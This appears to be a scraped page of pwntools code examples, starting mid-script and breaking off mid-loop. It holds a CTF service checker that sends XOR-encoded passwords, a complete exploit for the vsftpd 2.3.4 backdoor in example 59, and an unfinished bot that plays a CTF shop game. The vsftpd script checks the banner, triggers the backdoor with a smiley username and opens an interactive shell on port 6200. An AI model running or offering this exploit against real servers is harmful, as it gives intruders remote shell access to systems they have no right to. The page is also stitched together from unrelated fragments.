    if not r.recvline().strip() == str_without_translate:
        raise RuntimeError("Wrong translation after wrong password attempt")

    r.send("dict {}\n".format(dict_id1))
    info = r.recvline()
    m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
    if not m:
        raise RuntimeError("Wrong password request")
    byte = int(m.group(1), 16)
    r.send(pwd1 + 'XXX\n')
    if not r.recvline() == 'Please input only hexadecimal characters\n':
        raise RuntimeError("Wrong message after invalid password")
    if not r.recvline() == "Dictionary not loaded\n":
        raise RuntimeError("Wrong message after invalid password")
    r.send("translate {}\n".format(str_to_translate))
    if not r.recvline().strip() == str_without_translate:
        raise RuntimeError("Wrong translation after invalid password attempt")

    r.send("dict {}\n".format(dict_id1))
    info = r.recvline()
    m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
    if not m:
        raise RuntimeError("Wrong password request")
    byte = int(m.group(1), 16)
    r.send(''.join(chr(ord(c) ^ byte) for c in pwd1).encode('hex') + '\n')
    if not r.recvline() == 'Password ok!\n':
        raise RuntimeError("Can't load dictionary")
    if not r.recvline() == 'Dictionary loaded\n':
        raise RuntimeError("Can't load dictionary")
    r.send("translate {}\n".format(str_to_translate))
    if not r.recvline().strip() == str_after_translate_1:
        raise RuntimeError("Wrong translation after loading stored dictionary")

    r.send("dict {}\n".format(dict_id2))
    info = r.recvline()
    m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
    if not m:
        raise RuntimeError("Wrong password request")
    byte = int(m.group(1), 16)
    r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n')
    if not r.recvline() == 'Password ok!\n':
        raise RuntimeError("Can't load dictionary")
    if not r.recvline() == 'Dictionary loaded\n':
        raise RuntimeError("Can't load dictionary")
    r.send("translate {}\n".format(str_to_translate))
    if not r.recvline().strip() == str_after_translate_2:
        raise RuntimeError("Wrong translation after loading stored dictionary")

    r.send("quit\n")
    if not r.recvall() == "Good bye!\n":
        raise RuntimeError("Wrong goodbye")
Esempio n. 59
0
#!/usr/bin/python3
from pwn import log,remote
from sys import argv,exit
from time import sleep

if len(argv) < 2:
    exit(f'Usage: {argv[0]} Target_IP')


p = log.progress("Running")
vsftpd = remote(argv[1], 21)

p.status('Checking Version')
recv = vsftpd.recvuntil(")",timeout=5)
version = (recv.decode()).split(" ")[2].replace(")","")
if version != '2.3.4':
	exit('2.3.4 Version Not Found')

vsftpd.sendline('USER hii:)')
vsftpd.sendline('PASS hello')
p.status('Backdoor Activated')

sleep(3)

backdoor = remote(argv[1], 6200)
p.success("Got Shell!!!")
backdoor.interactive()


Esempio n. 60
0
import pwn

r = pwn.remote('jh2i.com', 50031)
turnToShop = 1
while True:
    try:
        print(
            '--------------------------------------------------------------------------------'
        )
        msg = r.recv().decode()
        print(msg)
        msg = msg.split()
        gold = msg[msg.index('Gold:') + 1]
        level = msg[msg.index('level:') + 1]
        # print(msg)
        print('Gold : ', gold)
        print('Level : ', level)
        # browse the shop
        if level == '0':
            if turnToShop == 1:
                print('Browsing the shop...')
                turnToShop = 0
                r.sendline('6')
            else:
                print('Buying sword...')
                turnToShop = 1
                r.sendline('1')
        elif level == '1':
            if int(gold) < 1000:
                print('Going on a journey...')
                r.sendline('5')